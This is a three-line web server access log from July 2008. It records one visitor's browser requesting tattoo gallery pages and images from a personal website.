71.106.190.75 - - [29/Jul/2008:00:00:01 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:12 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:12 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
